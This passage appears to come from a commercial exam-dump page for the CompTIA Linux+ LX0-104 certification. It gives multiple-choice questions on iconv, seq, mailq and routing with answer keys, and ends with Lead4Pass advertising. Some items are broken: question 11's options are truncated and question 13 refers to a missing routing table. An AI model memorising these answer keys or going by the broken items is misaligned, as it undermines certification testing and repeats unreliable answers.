A. newaliases -or- sendmail -bi
Correct Answer: A

QUESTION 10
What is the purpose of the iconv command?
A. It converts bitmap images from one format to another such as PNG to JPEG.
B. It verifies that the root directory tree complies to all conventions from the Filesystem Hierarchy Standard (FHS).
C. It displays additional meta information from icon files ending in .ico.
D. It changes the mode of an inode in the ext4 file system.
E. It converts files from one character encoding to another.
Correct Answer: E

QUESTION 11
What output will the following command produce?
seq 1 5 20
A. 1
B. 1
C. 1
D. 2
E. 5
Correct Answer: A

QUESTION 12
What is the purpose of the command mailq?
A. It fetches new emails from a remote server using POP3 or IMAP.
B. It is a multi-user mailing list manager.
C. It is a proprietary tool contained only in the qmail MTA.
D. It queries the mail queue of the local MTA.
E. It is a command-line based tool for reading and writing emails.
Correct Answer: D

QUESTION 13
Given the following routing table:lead4pass LX0-104 exam question q13

How would an outgoing packet to the destination 192.168.2.150 be handled?
A. It would be passed to the default router 192.168.178.1 on wlan0.
B. It would be directly transmitted on the device eth0.
C. It would be passed to the default router 255.255.255.0 on eth0.
D. It would be directly transmitted on the device wlan0.
E. It would be passed to the router 192.168.1.1 on eth0.
Correct Answer: E

Related LX0-104 Popular Exam resources

title pdf youtube CompTIA lead4pass Lead4Pass Total Questions
CompTIA Linux+ Powered by LPI lead4pass LX0-104 dumps pdf lead4pass LX0-104 youtube Linux+ (Plus) Certification | CompTIA IT Certifications https://www.lead4pass.com/lx0-104.html 178 Q&A
lead4pass LX0-103 dumps pdf lead4pass LX0-103 youtube   https://www.lead4pass.com/lx0-103.html 120 Q&A

Get Lead4Pass Coupons(12% OFF)

lead4pass coupon

What are the advantages of Lead4pass?

We have a number of CompTIA , CompTIA , ibm, CompTIA and other exam experts. We update exam data throughout the year. Top exam pass rate! We have a large user base. We are the industry leader! Choose Lead4Pass to pass the exam with ease!

about lead4pass

Summarize:

The free CompTIA Linux+ Powered by LPI LX0-104 exam dumps can help you improve your skills and exam experience! To pass the cisco LX0-104 exam at once: https://www.lead4pass.com/lx0-104.html We make CompTIA LX0-104 videos and LX0-104 pdf for you to learn! I hope you can pass the exam easily.